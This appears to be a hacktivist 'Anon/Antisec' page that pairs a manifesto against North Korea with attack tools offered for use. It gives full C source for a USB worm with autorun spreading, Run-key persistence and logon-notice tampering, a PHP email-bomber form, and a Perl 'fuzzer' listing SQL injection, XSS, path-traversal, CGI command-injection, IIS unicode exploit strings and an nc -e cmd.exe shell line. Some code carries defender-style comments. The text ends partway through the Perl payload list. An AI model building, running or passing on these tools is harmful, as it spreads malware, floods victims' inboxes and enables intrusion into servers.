North Korea: Down the Rabbit Hole

Greetings Fellow Anons, Supporters, and Oppressors Worldwide:

The diplomatic crisis of North Korea has come to our attention, however, even more so, the oppression of the North Korean people by the tyrant Kim Jong-Un has become increasingly more grave. We have decided we must act. The people of North Korea lack even the simplest aspects of cyber freedom. There is no Internet in North Korea but the Intranet. And the Intranet is state-censored, which means e.v.e.r.y.t.h.i.n.g. is about the grandness of North Korea. In other words, it is filled to the brims with other bullshit. We will not stand back and watch as the world lets the atrocities in North Korea take place. So, we have taken up arms against them, our lasers are charged, and our cannons are aimed. The Flickr and Twitter pages of the North Korean propaganda agencies have been hacked and taken down by the forces sailing alongside our freedom cruise. The time to act is now, the time to stand up for the people of North Korea is now. We must if we are to fight ever again for the freedom of the people of this Earth. The. Time. Is. Now. Arise, my friends!

Stay strong and Rise Up In Rebellion, We Must Fight.

-The Royal Anon 

USB Worm

Anons,

We must continue to step up our efforts. Below I have written a USB worm virus. Enjoy! Antisec is strong, stay strong.

#include <windows.h>
#include <stdio.h>
/* Marker text that WinMain passes to WriteFile(); as a fixed literal it is
 * also usable as a content signature when scanning files or binaries. */
#define IMSG “|__[__]__/=+-\\ SaveItForLater :] USB Worm /-+=\\__[__]__|”
/* Path of the running executable. Filled in by GetModuleFileName() in WinMain
 * and used as the CopyFile() source by Startup() and spreadUSB(). */
char me[1024];
/* File-scope registry handle used by Startup(); winLogin() declares its own
 * local hKey, which shadows this one. */
HKEY hKey;
/* Drive roots probed by spreadUSB(): 24 entries, C through Z. Each entry is a
 * string literal, and spreadUSB() later uses these entries as strcat()
 * destinations. */
char *drives[] = {“C:”,”D:”,”E”,”F:”,”G:”,”H:”,”I:”,”J:”,”K:”,”L:”,
                  “M:”,”N:”,”O:”,”P:”,”Q:”,”R:”,”S:”,”T:”,”U:”,”V:”,
                  “W:”,”X:”,”Y:”,”Z:”};
/*
 * Propagation thread, started from WinMain via CreateThread().
 *
 * After each 120-second sleep it walks drives[] and acts on GetDriveType():
 *   - DRIVE_REMOVABLE: writes autorun.inf (open=Driver_Update.exe) to the
 *     drive and copies the running executable there as Driver_Update.exe;
 *   - DRIVE_CDROM: same pattern with Worm_Pwn.exe;
 *   - DRIVE_REMOTE: copies the executable as Upd_Config.exe, no autorun.inf.
 * The loop has no exit, so the function never returns a value.
 *
 * Defender notes: this is replication through removable media (MITRE ATT&CK
 * T1091). The artifacts to hunt for are the three file names above appearing
 * at a drive root, paired with an autorun.inf whose open= line names them.
 * Disabling AutoRun by policy (NoDriveTypeAutoRun) removes the execution
 * path; Windows 7 and later already ignore open= on non-optical removable
 * media, so there the copy still lands but needs a user to launch it.
 */
DWORD WINAPI spreadUSB()
{
    while(1)
    {
        /* Sleep() takes milliseconds: two minutes between sweeps. */
        Sleep(120000);
        int i;
        /* 24 matches the number of entries in drives[]. */
        for(i = 0;i < 24;i++)
        {
            if((GetDriveType(drives[i])) == DRIVE_REMOVABLE)
            {
                char hldPath[50];
                char usbFile[30] = “\\Driver_Update.exe”;
                char autoRun[50] = “[autorun]\r\nopen=Driver_Update.exe”;
                strcpy(hldPath,drives[i]);
                strcat(hldPath,”\\autorun.inf”);
                /* autorun.inf is staged in the process's current directory
                 * first, so a short-lived autorun.inf next to the running
                 * binary is a secondary artifact. fp is not checked. */
                FILE *fp = fopen(“autorun.inf”,”w”);
                fprintf(fp,autoRun);
                fclose(fp);
                /* bFailIfExists = 0: an autorun.inf already on the drive is
                 * overwritten. */
                CopyFile(“autorun.inf”,hldPath,0);
                remove(“autorun.inf”);
                /* NOTE(review): the destination is the drives[] entry itself,
                 * a string literal, which is undefined behaviour in C; what a
                 * given build actually does here should be confirmed in a
                 * sandbox rather than read off the source. */
                strcat(drives[i],usbFile);
                CopyFile(me,drives[i],0);
            }
            else if((GetDriveType(drives[i])) == DRIVE_CDROM)
            {
                char cdPath[50];
                char cdFile[20] = “\\Worm_Pwn.exe”;
                char cdAutr[50] = “[autorun]\r\nopen=Worm_Pwn.exe”;
                strcpy(cdPath,drives[i]);
                strcat(cdPath,”\\autorun.inf”);
                FILE *fpp = fopen(“autorun.inf”,”w”);
                fprintf(fpp,cdAutr);
                fclose(fpp);
                /* bFailIfExists = 1 in this branch: an existing autorun.inf
                 * on the volume is left in place. */
                CopyFile(“autorun.inf”,cdPath,1);
                remove(“autorun.inf”);
                strcat(drives[i],cdFile);
                CopyFile(me,drives[i],0);
            }
            else if((GetDriveType(drives[i])) == DRIVE_REMOTE)
            {
                /* Mapped network drives receive only the executable, so an
                 * Upd_Config.exe at the root of a share is the indicator. */
                char remName[20] = “\\Upd_Config.exe”;
                strcat(drives[i],remName);
                CopyFile(me,drives[i],0);
            }
        }
    }
}
/*
 * Installs the running executable for persistence.
 *
 * Copies `me` to <Windows directory>\services.exe and, when that copy
 * succeeds, tries to register the path as value "services" under
 * HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
 *
 * Returns 0 when CopyFile() fails, which includes the destination already
 * existing because bFailIfExists is 1. Returns 1 otherwise, whether or not
 * the registry key could be opened or written.
 *
 * Defender notes: Run-key persistence (MITRE ATT&CK T1547.001) combined with
 * a system-process name in the wrong directory (T1036.005). The genuine
 * services.exe lives in System32, so a services.exe directly under the
 * Windows directory, or a Run value named "services" pointing at one, is a
 * strong indicator. Both writes target machine-wide locations; presumably
 * they fail for a non-elevated process — confirm on the OS in question.
 */
BOOL Startup()
{
    char dropTo[1024];
    GetWindowsDirectory(dropTo,1024);
    strcat(dropTo,”\\services.exe”);
    /* bFailIfExists = 1: a second run on an already-infected host fails here. */
    if((CopyFile(me,dropTo,1)) == 0)
        return 0;
    else
    {
        /* Uses the file-scope hKey. The RegSetValueEx() result is ignored. */
        if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, “Software\\Microsoft\\Windows\\CurrentVersion\\Run”,0,KEY_SET_VALUE,&hKey) == ERROR_SUCCESS)
        {
            RegSetValueEx(hKey,”services”,0,REG_SZ,(const unsigned char*)dropTo,strlen(dropTo));
            RegCloseKey(hKey);
        }
        return 1;
    }
}
/*
 * Nuisance thread, started from WinMain via CreateThread().
 *
 * In a loop with no delay it takes whatever window is in the foreground and
 * sets its title to the banner string. lParam is unused and the function
 * never returns.
 *
 * Defender notes: the changed window titles are a user-visible symptom and
 * the banner literal is a string signature. The loop contains no Sleep(), so
 * presumably the process also shows sustained CPU use — confirm when
 * triaging.
 */
DWORD WINAPI changeTitle(LPVOID lParam)
{
    while(1)
    {
        HWND hWnd = GetForegroundWindow();
        SetWindowText(hWnd,”|__[__]__/=+-\\ SaveItForLater :] Worm – illuz1oN /-+=\\__[__]__|”);
    }
}
/*
 * Overwrites the Windows logon notice.
 *
 * Sets LegalNoticeCaption and LegalNoticeText under
 * HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon to the banner
 * strings below. No return value is checked, so RegSetValueEx() is called
 * even when RegOpenKeyEx() failed.
 *
 * Defender notes: these two values hold the message shown to users at logon,
 * so the change is visible on the next logon and persists until the values
 * are restored. Registry auditing on the Winlogon key catches the write, and
 * cleanup needs to reset both values as well as removing the binary. The
 * text embeds the author handle and contact address, which are useful as
 * search strings.
 */
void winLogin(void)
{
    /* Local handle; shadows the file-scope hKey. */
    HKEY hKey;
    char szCaption[] = ”          |__[__]__/=+-\\ illuz1oN /-+=\\__[__]__|”;
    char szText[] = ”             |__[__]__/=+-\\ SaveItForLater :] Worm By illuz1oN /-+=\\__[__]__|”
                    “\nIf you want to remove this worm, contact illuz1oN – illuz1oN@hotmail.co.uk”
                    “\n… AV Companies ~censored~ You …”;
    /* The same key is opened and closed once per value. */
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,”Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon”,0,KEY_SET_VALUE,&hKey);
    RegSetValueEx(hKey,”LegalNoticeCaption”,0,REG_SZ,(const unsigned char*)szCaption,sizeof(szCaption));
    RegCloseKey(hKey);
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,”Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon”,0,KEY_SET_VALUE,&hKey);
    RegSetValueEx(hKey,”LegalNoticeText”,0,REG_SZ,(const unsigned char*)szText,sizeof(szText));
    RegCloseKey(hKey);
}
/*
 * Entry point. Order of operations as written:
 *   1. Record the executable's own path in `me`.
 *   2. Create a named mutex and exit if it already exists (one instance per
 *      session).
 *   3. Call Startup().
 *      - Startup() == 0 (copy to the Windows directory failed or the file
 *        was already there): enumerate "*.*" in the current directory, run
 *        the file-handling branches below, then fall off the end of WinMain.
 *      - otherwise: change the logon notice, start the changeTitle and
 *        spreadUSB threads, and block forever.
 *
 * Defender notes: the mutex name is a host indicator that can be checked in
 * a live process listing or memory image. Because Startup() also returns 0
 * when its destination file already exists, the long-running behaviour
 * (threads, logon notice) belongs to the run that performed the install;
 * later launches take the enumeration branch instead.
 */
int WINAPI WinMain (HINSTANCE hinst,HINSTANCE prhin,LPSTR argsx,int in)
{
    GetModuleFileName(0,me,1024);
    /* Handle is discarded; only the GetLastError() side effect is used. */
    CreateMutex(0,0,”-+- illuz1oN -+-“);
    if(GetLastError() == ERROR_ALREADY_EXISTS)
    {
        ExitProcess(0);
    }
    else
    {
        if((Startup()) == 0)
        {
         char szMask[4] = “*.*”;
         DWORD ret = 0;
         WIN32_FIND_DATA fData;
         HANDLE hFind,hFile;
         /* hFind is not compared with INVALID_HANDLE_VALUE before use. */
         hFind = FindFirstFile(szMask,&fData);
         /* NOTE(review): this compares the address of the cFileName array
          * with the address of a literal rather than matching a file name,
          * so as written the branch looks unreachable. Treat "text files
          * overwritten" as unconfirmed until verified on an affected host. */
         if(fData.cFileName == “*.txt”)
         {
            /* Intended effect when reached: open an existing file for
             * writing and write the IMSG marker at its start. */
            hFile = CreateFile(fData.cFileName,GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
            if(hFile == INVALID_HANDLE_VALUE)
               ExitProcess(0);
            else
            {
               WriteFile(hFile,IMSG,sizeof(IMSG),&ret,0);
               CloseHandle(hFile);
            }
         }
         /* Same address comparison as above. */
         else if(fData.cFileName == “*.exe”)
         {
            /* Intended effect when reached: mark the file hidden + system. */
            SetFileAttributes(fData.cFileName,FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
            CloseHandle(hFile);
         }           
         /* The loop repeats the two branches above for every further entry. */
         while (FindNextFile(hFind,&fData))
         {
            if(fData.cFileName == “*.txt”)
            {
               hFile = CreateFile(fData.cFileName,GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
               if(hFile == INVALID_HANDLE_VALUE)
                  ExitProcess(0);
               else
               {
                  WriteFile(hFile,IMSG,sizeof(IMSG),&ret,0);
                  CloseHandle(hFile);
               }
            }         
            else if(fData.cFileName == “*.exe”)
            {
               SetFileAttributes(fData.cFileName,FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
               CloseHandle(hFile);
            }               
         }           
         FindClose(hFind);
        }
        else
        {
            winLogin();
            /* Thread handles are discarded; both threads loop forever. */
            unsigned long title;
            CreateThread(0,0,changeTitle,0,0,&title);
            unsigned long virii;
            CreateThread(0,0,spreadUSB,0,0,&virii);
            /* Keeps the process alive so the two threads keep running. */
            Sleep(INFINITE);
        }
    }
}

The Infamous Email Bomber

Greetings Fellow Anons!

For decades, hackers and crackers internationally have been using the email bomber program to create havoc. That is just what the antisec movement needs. I have written a php version of it, enjoy! Stay strong. 

<?php
 

// Web form that sends one message to one recipient between 2 and 9999 times
// per POST, using PHP's mail(). When no POST field is set it prints the
// input form instead.
//
// Defender notes: found on a server you operate, this is an abuse finding.
// Nothing in it authenticates the caller or limits request rate, and the
// sender address is whatever the form supplies. The symptom is a burst of
// outbound messages from the web server's mail queue with one recipient and
// identical bodies. php.ini's mail.add_x_header and mail.log record which
// script called mail(); MTA-side per-sender rate limits, and
// disable_functions=mail where PHP mail is not needed, bound the damage.
//
// Remember, you must add in any filtration
// functions yourself, such as the famous
// mysql_real_escape_string(); or even
// htmlentities(); or a custom function...
// NOTE(review): neither function named above is applied anywhere below, and
// mysql_real_escape_string() is an SQL escaper; it does not protect mail
// headers or HTML output.
 
$f_name = isset($_POST['f_name']) ? $_POST['f_name'] : "";
$f_email = isset($_POST['f_email']) ? $_POST['f_email'] : "";
 
$r_email = isset($_POST['r_email']) ? $_POST['r_email'] : "";
 
$subject = isset($_POST['subject']) ? $_POST['subject'] : "";
$message = isset($_POST['message']) ? $_POST['message'] : "";
 
// Drops everything from the first '.' onward. The result is not checked to
// be digits; it is only compared loosely with 2 and 9999 further down.
$number = isset($_POST['number']) ? preg_replace('/\..*/', '', $_POST['number']) : "";
 
// Sender name and address go into the header block exactly as received.
// $f_name is only length-checked below, so the From line is fully
// caller-controlled — recipients and filters cannot trust it.
$header = "From: ".$f_name." <".$f_email.">\n";
$header .= "Reply-To: ".$f_email."\n";
 
echo "<center>\n";
 
// Any non-empty field switches from "show the form" to "validate and send".
if ($f_name != "" || $f_email != "" || $r_email != "" || $subject != "" || $message != "" || $number != "") {
        $errors = "";
 
        if (strlen($f_name) > 40) {
                $errors .= "Your name must be 40 characters or less.<br />\n";
        }
 
        if ($f_email == "") {
                $errors .= "You must enter a sender email address.<br />\n";
        } else {
                // Syntax check only; ownership of the address is never verified.
                if (!preg_match("/^[-0-9A-Z_.]{1,50}@([-0-9A-Z_.]+.){1,50}([0-9A-Z]){2,4}$/i", $f_email)) {
                        $errors .= "You must enter a valid sender email address.<br />\n";
                }
        }
 
        if (strlen($f_email) > 60) {
                $errors .= "Your email must be 60 characters or less.<br />\n";
        }
 
        if ($r_email == "") {
                $errors .= "You must enter a recipient email address.<br />\n";
        } else {
                if (!preg_match("/^[-0-9A-Z_.]{1,50}@([-0-9A-Z_.]+.){1,50}([0-9A-Z]){2,4}$/i", $r_email)) {
                        $errors .= "You must enter a valid recipient email address.<br />\n";
                }
        }
 
        if (strlen($r_email) > 60) {
                $errors .= "The recipient email must be 60 characters or less.<br />\n";
        }
 
        if (strlen($subject) > 40) {
                $errors .= "The subject must be 40 characters or less.<br />\n";
        }
 
        if ($message == "") {
                $errors .= "You must enter a message to send.<br />\n";
        }
 
        if ($number == "") {
                $errors .= "You must enter a number of messages to send.<br />\n";
        } else {
                // Accepted range is 2..9999 messages per request.
                if ($number < 2) {
                        $errors .= "You must enter a number greater than 1.<br />\n";
                } elseif ($number > 9999) {
                        $errors .= "You must enter a number less than 10000.<br />\n";
                }
        }
 
        if ($errors == "") {
                // One mail() call per iteration. Return values are ignored, so
                // the success line below is printed whether or not the local
                // MTA accepted anything.
                if ($subject == "") {
                        for($i=1; $i <= $number; $i++){
                                // rand(1, 100) yields at most 100 distinct
                                // five-character hex subjects, a small enough
                                // set to enumerate in a mail filter.
                                mail($r_email, substr(md5(rand(1, 100)), 0, 5), $message, $header);
                        }
                } else {
                        for($i=1; $i <= $number; $i++){
                                mail($r_email, $subject, $message, $header);
                        }
                }
 
                // $number and $r_email are echoed without htmlentities().
                echo $number." messages have been sent to ".$r_email." successfully.<br />\n<a href='nojavascript...history.go(-1);' title='Start Another Mail Bomb'>Start Another Mail Bomb</a><br />\n";
        } else {
                echo "<span style='color: red;'>n".$errors."</span>\n<a href='nojavascript...history.go(-1);' title='Try Again'>Please Try Again</a><br />\n";
        }
} else {
        // No input yet: render the form. The maxlength attributes here are
        // browser-side only; the server-side checks above are what count.
        echo "* Denotes a required field.<br /><br />nNote that leaving a subject blank<br />nwill generate a random subject<br />nfor every new message.<br /><br />\n";
        echo "<table cellspacing='2' cellpadding='2'>\n";
        echo "<form action='' method='post'>\n";
        echo "<tr>\n";
        echo "<td>Your Name:</td>\n";
        echo "<td><input type='text' name='f_name' size='50' maxlength='40' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Your Email: *</td>\n";
        echo "<td><input type='text' name='f_email' size='50' maxlength='60' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Recipient Email: *</td>\n";
        echo "<td><input type='text' name='r_email' size='50' maxlength='60' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Subject:</td>\n";
        echo "<td><input type='text' name='subject' size='50' maxlength='40' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Message: *</td>\n";
        echo "<td><textarea name='message' rows='5' cols='50'></textarea></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Number Of Messages: *</td>\n";
        echo "<td><input type='text' name='number' size='4' maxlength='4' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td></td>\n";
        echo "<td><input type='submit' value='Start Mail Bomb' /></td>\n";
        echo "</tr>\n";
        echo "</form>\n";
        echo "</table>\n";
}
 
echo "</center>\n";
 
?>

Perl Server Fuzzer

Greetings Anons,

As our revolution grows more and more urgent, our channels of attack and our tools at our disposal must be used to their fullest potential. Below I have written a perl script for server fuzzing, remember the revolution! Do not forgive, nor forget! Stay strong my friends.

 

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
use 5.0.10;
use strict;
use warnings;

my $host = $ARGV[0];

 
my @Fuzzer=(
      “cat ../../etc/passwd%00″,”alert(document.cookie);”,”/cgi-bin/*”,”/cgi-bin/”,
      “&0=+1+union+select”,”order+by+5–“,”order+by+100–“,”SELECT * FROM users–“,”../../etc/group”,
      “SELECT * FROM wp_users–“,”cat%20../../etc/group%00”,
      “PUT /pentest/windows-binaries/tools/nc.exe && nc -lvp 8080 -e cmd.exe”,
      “cd /var/www/htdocs && grep phpinfo www”,”‘ or ‘a’=’a”,”or 1=1″,”../../../boot.ini”,
      “‘ or ‘x’=’x–“,”admin’–“,”echo <?php phpinfo()?>”
                       ); 

my @XSS = ( “”>alert(‘XSS’) “, 
            “”>alert(123)<“,
            “”><IMG SRC=”javascript:alert(123);”> “,   
            “”>alert(123)”, 
            “”>”, 
            ” “><IMG SRC=”javascript:alert(‘XSS’)”> “,
            “”><IMG SRC=nojavascript…alert(‘XSS’)> “,
            “”><IMG SRC=nojavascript…alert(‘XSS’)> “,
            “”><IMG “””>alert(“XSS”)”> “,
            ” “><IMG “””>alert(123)> “,
            “”><IMG SRC=nojavascript…alert(String.fromCharCode(88,83,83))> “,
            ” <IMG SRC=”jav%20%20%20%20ascript:alert(‘XSS’)”;”> “,
            “”>alert(document.cookie) “,
            ” “><alert(123);//<“,
            “”><IMG SRC=java%00script:alert(String.fromCharCode(88,83,83))> “,
           ); #<-Add XSS payload strings here. Its a bitch
                                                                                                                                                                                             #to debug if you dont escape quotes
my @SQLtests = ( ” ‘ “,” ” “,” ‘ or 1=1– ” , ” ‘ or ‘a’=’a”,” ‘ or ‘x’=x”, ” ” or “z”=”z”,
                 “1 OR 1=1–“,”1,1″, ” ‘ or 5-5–“,”‘ having 1=1–” );

my @MSSQL= (“‘ having 1=1–“,”1 EXEC SP_ (or EXEC XP_)”,”1 AND USER_NAME() = ‘dbo'”, ” ;exec..cmd=’dir'”,
        “AND 1=(SELECT COUNT(*) FROM tablenames); –“,”+1 UNION ALL SELECT 1,2,name,4,5,6,7 FROM sysObjects WHERE xtype = ‘U’–“,
       “1+UNION/**/ SELECT/**/ALL FROM WHERE “,”1 UNION ALL SELECT 1,2,3,4,5–“,”select * from users having 1=1+GROUP BY uid;–“,
       “-1+union+select+null–“,
       “-1+union+select+null,null;–“,
       “-1+union+select+null,null,null–“,
       “-1+union+select+null,null,null,null–“,
       “-1+union+select+null,null,null,null,null–“,
       “-1+union+select+null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null’–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null,null’–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null,null,null;–“, 
       “-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null–“
                                               ); #<- MSSqli strtings

my @MYSQL= (“1+order+by+2–“,”1+order by 3–“,”order by 50–“,”1+order+by+5–“,”1+order+by+6–“,”1+order+by+7–“,”1+order+by+8–“,
       “1+order+by+9–“,”1+order+by+10–“,”1+order+by+11–“,”1+order+by+12–“,”1+order+by+13”,”1+order+by+14–“,
       “and+1/**/union/**/select”,
       “-1/**/union/**/select/**/null–“,
       “-1/**/union/**/select/**/null,null–“,
       “-1/**/union/**/select/**/null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null–“);

my @LFIlogs = (“../../var/log/httpd/error.log”,”../../var/log/httpd/error_log”,”../../var/log/apache/error.log”,
               “../../var/log/apache/error_log”,”../../var/log/apache2/error.log”,” ../../etc/passwd%00″,
              “../../var/log/apache2/error_log”,”../../logs/error.log”,”../../usr/local/apache/logs/error_log”,
               “../../var/log/apache/error_log”,”../../var/log/apache/error.log”,”../../var/www/logs/error_log”,
               “../../etc/httpd/logs/error_log”,”../../etc/httpd/logs/error.log”,”../../etc/passwd”,
               “../../var/www/logs/error.log”,”../../usr/local/apache/logs/error.log”,”../../etc/group”,
               “../../var/log/error_log”,”../../apache/logs/error.log”,”../../etc/passwd”,”../../etc/group%00″
                                           );#<-LFI and/or traversal to possible LFI strings

my @CGIs = (“/cgi-bin/handler/bah;cat%20%20%20/etc/passwd|?  data=Download”, 
       “../cgi-bin/handler/bah;cat%20%20/etc/passwd |    ?  data=Download”, 
       “/cgi-bin/test-cgi?/* Replace /*”,
       “/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd”,
       “../blah.php?source=/msadc/Samples/../../../../../boot.ini”,
       “../cgi-bin/faxsurvey?/bin/cat%20%20%20%20/etc/passwd”,
       “/cgi-bin/campas?%0acat%0a/etc/passwd%0a”,
       “/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd”,
       “/archive-j457nxiqi3gq59dv/199805/count.cgi.l”,
       “/cgi-bin/pfdispaly.cgi? /../../../../etc/passwd”,
       “/cgi-bin/pfdispaly.cgi?’%0A/bin/uname%20-a|'”,
       “/scripts/convert.bas?../../win.ini”,
       “/cgi-bin/htmlscript? ../../../../etc/passwd”,
       “/cgi-bin/infosrch.cgi cmd=getdoc&db=man&fname=|/bin/id”,
       “/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/passwd”,
       “echo -e “GET http://$host/cgi-bin/loadpage.cgi? user_id=1&file=|”/bin/ls”| HTTP/1.0″ | nc  -lvp 8080”
               ); #Arbitrary cgi strings

my @Unicode = (“/scripts/..%c0%af../winnt/system32/cmd.exe?/c+”,”/scripts..%c1%9c../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+”,”/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+”,”/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+”,”/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%c1%af../winnt/system32/cmd.exe?/c+”,”/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+”,”/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+”,”/MSADC/root.exe?/c+dir”,
               “/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+”,
               “/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir”,
               “/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir”,
               “/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir”,”/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir”,”/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%252f../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,”/scripts/..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
“/scripts/root.exe?/c+dir/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir”,
               “/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,             “/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir”,
               “/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir”,
